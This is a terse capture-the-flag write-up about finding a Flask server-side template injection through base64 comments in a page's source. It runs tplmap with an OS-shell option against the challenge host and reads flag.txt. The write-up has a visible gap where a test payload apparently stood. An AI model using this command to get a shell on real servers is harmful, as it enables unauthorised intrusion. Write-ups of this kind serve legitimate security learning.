There were some base64 encoded comments in the HTML source code. One of the comment leads to: http://220.127.116.11:5050/?secret=flag
If you look to the HTML source, there is "flag" string. So what about:
Then there is "49" in the source, so it is flask injection: https://github.com/epinna/tplmap
python tplmap.py -u http://18.104.22.168:5050/?secret=flag --os-shell
[+] Run commands on the operating system.
posix-linux $ ls
posix-linux $ cat flag.txt